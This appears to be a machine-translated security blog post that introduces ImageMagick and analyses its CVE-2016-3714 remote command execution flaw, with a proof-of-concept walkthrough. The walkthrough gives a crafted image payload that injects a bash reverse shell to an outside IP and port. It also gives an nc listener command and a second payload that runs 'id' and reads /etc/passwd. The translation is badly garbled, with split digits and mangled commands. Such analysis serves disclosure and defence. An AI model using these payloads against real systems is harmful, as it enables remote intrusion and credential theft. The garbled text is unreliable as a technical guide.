ImageMagick remote execution vulnerability analysis and exploit-vulnerability warning-the black bar safety net

2016-09-30T00:00:00
ID MYHACK58:62201679772
Type myhack58
Reporter simeon
Modified 2016-09-30T00:00:00

Description

1.1 ImageMagick description

1. ImageMagick description

ImageMagick is a set of powerful, stable and open source set of tools and development kits that can be used to read, write and process the more than 8 9 basic format of the picture file, including the popular TIFF, JPEG, GIF, PNG, PDF, and PhotoCD formats. Using ImageMagick, you can according to web application of needs dynamic generated pictures, also can be one(or a group)pictures to change the size, rotate, sharpen, reduce the color or add effects, etc. operation, and the operation results in the same format or other format to save for picture of the operation, which can be via the command line, you can also use C/C++, Perl, Java, PHP, Python or Ruby programming to complete. While ImageMagick provides a high-quality 2D Toolkit, partial support for SVG. ImageMagic main focus on the performance, reduce bugs and provide a stable API and ABI, their official site is http://www. imagemagick. org/it.

ImageMagick is used to create, edit, composite picture software. It can read, convert, write a variety of formats pictures. Picture cut, color replacement, various effects application, image rotation, composition, text, line, polygon, ellipse, curve, attached to a picture of the extended rotation. ImageMagick is free software: full source code is open, you can freely use, copy, modify, publish. Supports most of theoperating system.

2. ImageMagick main function

(1)The image from one format to another format, including directly into the icon.

(2)Change the size, rotate, sharpen(sharpen), minus the color, picture effects

(3)a thumbnail image of the composite image( a montage of image thumbnails)

(4) is adapted to the web of the transparent background image

(5)a set of images made into a gif animation directly convert

(6) The a few pictures made into a combination of images, montage

(7)in a picture and write or draw a shape, with text-shadow and border rendering.

(8) to the image adding a border or frame

(9)to obtain some picture of the characteristics of the information

(1 0)includes almost gimp can be made to a conventional plug-in function. Even includes a variety of curve parameters of the rendering function. Just that command wording, complicated enough.

ImageMagick can be almost in any non-proprietaryoperating systemon the compilation, whether it is a 3 2-bit or 6 4-bit CPU, including LINUX, Windows '9 5/'9 8/ME/NT 4.0/2 0 0 0/XP,Macintosh (MacOS 9 /1 0), VMS and OS/2.

1.2 ImageMagick(CVE-2 0 1 6-3 7 1 4)remote execution vulnerability analysis

ImageMagick(CVE-2 0 1 6-3 7 1 4)remote execution vulnerability, the cause is because the character filter is not rigorous and the result of the code execution. For the file name passed to the after end of the command filter is insufficient,resulting in allowing a variety of file format conversion process in the remote code execution.

Affected version range:

  • ImageMagick6. 5. 7-8 2012-08-17
  • ImageMagick6. 7. 7-10 2014-03-06
  • Minimum version to 6. 9. 3-9 released 2016-04-30

1.3 available POC tests

  1. The experimental environment

Centos5. 8+ ImageMagick 6.2.8

  1. Installation steps

In centos, the default install is ImageMagick 6.2.8, this installation 6. 7. 7-1 0 version.

  1. yumremove ImageMagick
  2. wget http://www.imagemagick.org/download/releases/ImageMagick-6.5.7-10.tar.xz
  3. tar xvJf ImageMagick-6.5.7-1 0. tar. xz
  4. cd ImageMagick-6.5.7-1 0
  5. ./ configure
  6. make
  7. make install

Note: tar. xz file you need to use 7zip to unzip to a tar file then use tar-zxvf to decompress.

  1. Generate a bounce the shell of the png file

First construct a carefully prepared picture, the following content is saved as sh. png, where 1 2 2. 1 1 5. 4 x. 3x is bounced back to the listening port of the server, the listening port to 4 4 3 to 3.

  1. pushgraphic-context
  2. viewbox 0 0 6 4 0 4 8 0
  3. fill'url(https://example.com/image.jpg"|bash-i >& /dev/tcp/122.115.4 x. 3x/4 4 3 3 0>&1")'

  4. Execute the command

Before executing the command, the need to bounce the server on executing the“nc-vv-l-p 4 4 3 3”command. Execution of“convert sh. png 1. png”, the terminal will not respond until the bounce the shell to exit later, as shown in Figure 1.

!

Figure 1 executing the convert command

  1. Get the bounce of the shell

Execute the convert command, will be based on the network situation, in the listener on the server will delay for a few seconds, as shown in Figure 2, direct access to the bounce webshell。

!

Figure 2 get the rebound webshell

In bounce the shell terminates, it will display an error message, as shown in Figure 3.

!

Figure 3 shows the error message

1.4 summary and discussion

  1. A local vulnerability exists exp test

(1)construction exp. png

  1. pushgraphic-context
  2. viewbox 0 0 6 4 0 4 8 0
  3. fill'url(https://example.com/image.jpg"|id & cat /etc/passwd")'
  4. popgraphic-context

(2)implementation of exp to get the id and to view the passwd file

In Terminal mode, perform the convert exp. png 1. png is displayed after the ID and passwd in the content, as shown in Figure 4, indicating that vulnerability exists.

!

[1] [2] next